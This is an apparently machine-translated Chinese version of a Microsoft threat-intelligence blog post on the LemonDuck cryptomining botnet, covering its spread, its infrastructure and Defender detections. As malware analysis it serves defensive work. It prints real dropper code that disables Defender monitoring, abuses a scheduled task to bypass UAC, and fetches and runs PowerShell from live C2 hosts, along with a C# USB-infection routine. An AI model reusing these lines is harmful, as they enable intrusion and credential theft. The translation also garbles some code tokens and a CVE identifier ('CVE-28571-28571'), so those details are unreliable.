微软警告针对 Linux 和 Windows 机器的“不断发展的”LemonDuck 挖矿恶意软件
跳至主要内容 [注意:在这个由两部分组成的博客系列中,我们公开了一个现代恶意软件基础架构,并提供了防范它所支持的各种威胁的指南。第 1 部分介绍了威胁的演变、它如何传播以及它如何影响组织。第 2 部分将深入探讨攻击者的行为,并提供调查指导。] 对抗和预防当今对企业的威胁需要全面的保护,重点是解决攻击的全部范围和影响。任何可以访问机器的东西——甚至是所谓的商品恶意软件——都可能带来更危险的威胁。我们已经在银行木马中看到了这一点,作为勒索软件和手动键盘攻击的入口点。 LemonDuck 是一种主动更新且强大的恶意软件,主要以其僵尸网络和加密货币挖掘目标而闻名,当它采用更复杂的行为并升级其操作时,它遵循了相同的轨迹。今天,除了将资源用于其传统的机器人和挖矿活动之外,LemonDuck 还会窃取凭据、移除安全控制、通过电子邮件传播、横向移动,并最终为人工操作的活动丢弃更多工具。 LemonDuck 对企业的威胁还在于它是一种跨平台威胁。它是少数记录在案的针对 Linux 系统和 Windows 设备的机器人恶意软件家族之一。它使用了广泛的传播机制——网络钓鱼电子邮件、漏洞利用、USB 设备、暴力破解等——并且它已经表明它可以快速利用新闻、事件或新漏洞利用的发布来开展有效的活动。例如,在 2020 年,观察到在电子邮件攻击中使用以 COVID-19 为主题的诱饵。 2021 年,它利用新修补的 Exchange Server 漏洞来访问过时的系统。然而,这种威胁不仅限于新的或流行的漏洞。它继续使用较旧的漏洞,当重点转移到修补流行漏洞而不是调查妥协时,这有时会使攻击者受益。值得注意的是,LemonDuck 通过摆脱竞争性恶意软件并通过修补用于获取访问权限的相同漏洞来防止任何新感染,从而将其他攻击者从受感染设备中移除。早些年,LemonDuck 主要针对中国,但此后其业务扩展到许多其他国家,专注于制造业和物联网领域。今天,LemonDuck 影响了非常大的地理范围,美国、俄罗斯、中国、德国、英国、印度、韩国、加拿大、法国和越南的遭遇最多。 2021 年,LemonDuck 活动开始使用更多样化的命令和控制 (C2) 基础设施和工具。此更新支持入侵后手动操作键盘操作的显着增加,这取决于受感染设备对攻击者的感知价值。然而,尽管进行了所有这些升级,LemonDuck 仍然使用 C2、函数、脚本结构和变量名称的时间比普通恶意软件要长得多。这可能是因为它使用了防弹托管服务提供商,例如 Epik Holdings,即使报告有恶意行为,它们也不太可能使 LemonDuck 基础设施的任何部分脱机,从而使 LemonDuck 持续存在并继续构成威胁。对各种规模和操作的恶意软件基础设施的深入研究提供了对组织当今面临的广泛威胁的宝贵见解。就 LemonDuck 而言,威胁是跨平台的、持久的且不断发展的。像这样的研究强调了全面了解各种威胁的重要性,以及将简单、不同的活动(如硬币挖掘)与更危险的对抗性攻击相关联的能力。
LemonDuck 最早的文档来自其 2019 年 5 月的加密货币活动。这些活动包括 PowerShell 脚本,这些脚本采用了由计划任务启动的附加脚本。该任务用于引入 PCASTLE 工具以实现几个目标:滥用 EternalBlue SMB 漏洞,以及使用蛮力或传递哈希横向移动并再次开始操作。许多这些行为在今天的 LemondDuck 活动中仍然存在。 LemonDuck 以上述 PowerShell 脚本之一中的变量“Lemon_Duck”命名。该变量通常用作受感染设备的用户代理,并与分配的编号一起使用。该格式使用了两组由破折号分隔的字母字符,例如:“User-Agent: Lemon-Duck-[AZ]-[AZ]”。该术语仍然出现在 PowerShell 脚本以及许多执行脚本中,特别是在名为 SIEX 的函数中,该函数用于在最近 2021 年 6 月的攻击中的僵尸网络连接期间分配唯一的用户代理。 LemonDuck 经常使用 open - 由其他僵尸网络也使用的资源构建的源材料,因此这种威胁的许多组成部分看起来很熟悉。微软研究人员知道两种不同的操作结构,它们都使用 LemonDuck 恶意软件,但可能由两个不同的实体为不同的目标操作。第一个,我们称之为“鸭子”基础设施,使用本报告中讨论的历史基础设施。它在运行活动时高度一致,并执行有限的后续活动。这种基础设施很少与作为感染方法的边缘设备妥协结合使用,并且更有可能为其 C2 站点使用随机显示名称,并且总是在脚本中明确使用“Lemon_Duck”。第二个基础设施,我们称之为“猫”基础设施——主要使用两个带有“猫”一词的域(sqlnetcat[.]com、netcatkit[.]com)——出现在 2021 年 1 月。它被用于攻击利用Microsoft Exchange Server 中的漏洞。今天,Cat 基础设施用于攻击,这些攻击通常会导致安装后门、凭据和数据被盗以及恶意软件传播。人们经常看到它提供了恶意软件 Ramnit。 Duck 和 Cat 基础架构使用相似的子域,并且它们使用相同的任务名称,例如“blackball”。这两种基础设施还利用托管在相似或相同站点上的相同打包组件来进行挖掘、横向移动和竞争移除脚本,以及许多相同的函数调用。 Cat 基础设施用于更危险的活动这一事实并没有降低来自 Duck 基础设施的恶意软件感染的优先级。相反,这种情报增加了理解这种威胁的重要背景:可以动态地重复使用相同的工具、访问和方法集,以产生更大的影响。尽管加密货币矿工的威胁比其他恶意软件小,但它的核心功能反映了非货币化软件,这使得任何僵尸网络感染都值得优先考虑。
LemonDuck 以多种方式传播,但两种主要方法是 (1) 由边缘发起或由机器人植入在组织内横向移动所促成的妥协,或 (2) 机器人发起的电子邮件活动。 LemonDuck 充当许多其他后续活动的加载程序,但如果其主要功能是通过危害其他系统来传播的话。自首次出现以来,LemonDuck 运营商就利用对 Windows 和 Linux 设备的扫描来获取开放或弱身份验证的 SMB、Exchange、SQL、Hadoop、REDIS、RDP 或其他可能容易受到密码喷射或应用程序漏洞(如 CVE)攻击的边缘设备-2017-0144 (EternalBlue)、CVE-2017-8464 (LNK RCE)、CVE-2019-0708 (BlueKeep)、CVE-2020-0796 (SMBGhost)、CVE-2021-26855 (ProxyLogon)、CVE-28571-28571 (ProxyLogon)、CVE-2021-26858 (ProxyLogon) 和 CVE-2021-27065 (ProxyLogon)。一旦进入带有 Outlook 邮箱的系统,作为其正常利用行为的一部分,LemonDuck 会尝试运行利用设备上存在的凭据的脚本。该脚本指示邮箱向所有联系人发送带有预设邮件和附件的网络钓鱼邮件副本。由于这种联系消息传递方法,依赖于确定电子邮件是否来自可疑发件人的安全控制不适用。这意味着需要重新评估减少内部邮件扫描或覆盖范围的电子邮件安全策略,因为通过联系人抓取发送电子邮件在绕过电子邮件控制方面非常有效。从 2020 年年中到 2021 年 3 月,LemonDuck 的电子邮件主题和正文内容以及附件名称和格式都保持不变。与 2020 年初发生的类似活动相比,这些附件名称和格式几乎没有变化。冠状病毒的爆发令人担忧,尤其是在外国个人最近到达或将在不久的将来到达各种 intt 的情况下。用于这些诱饵的附件是以下三种类型之一:.doc、.js 或包含 .js 文件的 .zip。无论是哪种类型,该文件都被命名为“自述文件”。有时,所有三种类型都出现在同一封电子邮件中。
虽然 JavaScript 被许多安全供应商检测到,但它可能被归类为通用检测名称。对于组织来说,通过自定义检测规则等解决方案直接从邮件下载中清理 JavaScript 或 VBScript 执行或调用提示(如 PowerShell)可能很有价值。从 LemonDuck 开始运行以来,.zip 到 .js 文件的执行方式是最常见的。 JavaScript 已经取代了 LemonDuck 之前用来启动 PowerShell 脚本的计划任务。这个 PowerShell 脚本在 2020 年和 2021 年看起来非常相似,根据版本的不同会有细微的变化,表明持续发展。以下是电子邮件交付下载的最新迭代与 2020 年 4 月的变化的比较。 var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+ WScript.ScriptFullName+" & powershell -w hidden -c \"if([Environment]::OSVersion.version.Major -eq '10'){Set-ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Value 'cmd /c powershell -w hidden Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*% username%*%computername%''+[Environment]::OSVersion.version.Major) &::';sleep 1;schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I;Remove- ItemProperty -Path 'HKCU:\Environment' -Name 'windir' -Force}else{IEx(ne`w-obj`ect Net.WebC`lient).DownloadString('http://t.awcna.com/7p. php');bpu -method migwiz -Payload 'powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.awcna.com/mail.jsp?js*%username%*%电脑putername%''+[Environment]::OSVersion.version.Majo //此文件已损坏。 var cmd =new ActiveXObject("WScript.Shell");var cmdstr="cmd /c start /b notepad "+WScript.ScriptFullName+" & powershell -w hidden IE`x(New`w-Obj`ect Net.WebC` lient).DownLoadString('http://tz'+'z3r0.com/7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu( 'http://tz'+'z3r0.com/mail.jsp?js_0.7')";cmd.run(cmdstr,0,1); //此文件已损坏。发送电子邮件后,会清理收件箱以清除这些邮件的痕迹。这种自我传播方法会在任何具有邮箱的受影响设备上尝试,无论它是否是 Exchange 服务器。其他常见的感染方法包括在受感染环境中移动,以及通过 USB 和连接的驱动器。这些过程通常会自动启动,并且在 LemonDuck 的整个运营过程中始终如一。这些方法作为一系列 C# 脚本运行,收集可用的感染驱动器。他们还会根据是否发现已安装的威胁来创建已感染驱动器的运行列表。一旦检查了受感染驱动器的运行列表,这些脚本就会尝试在主目录中创建一组隐藏文件,包括 readme.js 的副本。在任何时候受到 LemonDuck 植入影响的任何设备都可能连接了任意数量的驱动器,这些驱动器以这种方式受到损害。这使得这种行为成为额外攻击的可能入口向量。
DriveInfo[] 驱动器 = DriveInfo.GetDrives(); foreach (DriveInfo drive in drive) { if (blacklist.Contains(drive.Name)) { continue;} Console.WriteLine("Detect drive:"+drive.Name); if (IsSupported(drive)) { if (!File.Exists(drive + home + inf_data)) { Console.WriteLine("Try to infect "+drive.Name); if (CreateHomeDirectory(drive.Name) && Infect(drive.Name)) { blacklist.Add(drive.Name); } } else { Console.WriteLine(drive.Name+"已经感染了!"); blacklist.Add(drive.Name); } } else{ blacklist.Add(drive.Name); Microsoft 365 Defender 提供的跨域可见性和协调防御旨在应对 LemonDuck 所体现的范围广泛且日益复杂的威胁。 Microsoft 365 Defender 具有 AI 驱动的行业领先保护,可以阻止跨域和跨平台的多组件威胁,例如 LemonDuck。适用于 Office 365 的 Microsoft 365 Defender 检测 LemonDuck 僵尸网络发送的恶意电子邮件,以传递恶意软件负载并传播机器人加载程序。 Microsoft Defender for Endpoint 检测并阻止 Linux 和 Windows 上的 LemonDuck 植入、有效负载和恶意活动。更重要的是,Microsoft 365 Defender 提供了丰富的调查工具,可以暴露对 LemonDuck 活动的检测,包括企图破坏和在网络上立足的尝试,因此安全运营团队可以高效、自信地响应和解决这些攻击。 Microsoft 365 Defender 关联跨平台、跨域信号以绘制端到端攻击链,使组织能够看到攻击的全部影响。我们还发布了一篇关于此威胁的威胁分析文章。 Microsoft 365 Defender 客户可以使用此报告获取重要的技术详细信息、调查指南、整合事件以及缓解此威胁(尤其是现代网络攻击)的步骤。在本博客系列的第 2 部分中,我们将分享对 LemonDuck 感染之后的恶意操作的深入技术分析。这些包括一般的、自动的行为以及人为初始化的行为。我们还将提供调查 LemonDuck 攻击的指南,以及加强对这些攻击的防御的缓解建议。 Microsoft 是网络安全领域的领导者,我们承担起让世界变得更安全的责任。了解更多信息 Microsoft 安全性入门
